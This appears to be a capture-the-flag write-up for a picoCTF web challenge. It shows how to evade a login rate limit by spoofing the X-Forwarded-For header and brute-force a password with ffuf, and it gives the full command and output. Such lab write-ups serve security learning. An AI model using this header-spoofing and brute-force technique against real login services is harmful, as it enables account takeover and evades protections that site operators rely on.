Here as the description says we are rate limited and in the hints it tells us to know more about the X-Forwarde-For header and simply we need to add this header to our request with a proxy ip (I used Google’s) and I used ffuf to speed up brute forcing and better than using Burp Intruder.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| ffuf -u http://amiable-citadel.picoctf.net:57519/login -H "Content-Type: application/json" -H "X-Forwarded-For: 203.0.113.195" -w passwords.txt:FUZZ -d '{"email":"ctf-player@picoctf.org","password":"FUZZ"}' -X POST -mc 200 -ac -t 50
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://amiable-citadel.picoctf.net:57519/login
:: Wordlist : FUZZ: /home/t4qi/CTFs/Platforms/PICO-CTF/WEB/Medium/crack_the_gate_2/passwords.txt
:: Header : Content-Type: application/json
:: Header : X-Forwarded-For: 203.0.113.195
:: Data : {"email":"ctf-player@picoctf.org","password":"FUZZ"}
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200
________________________________________________
KTxyUtJw [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 206ms]
fFWxC3W6 [Status: 200, Size: 132, Words: 1, Lines: 1, Duration: 206ms]
jCzS5pSV [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 205ms]
:: Progress: [20/20] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
|
the output of this command will give us three passwords and one of them got the biggest size then I tried it and got the flag.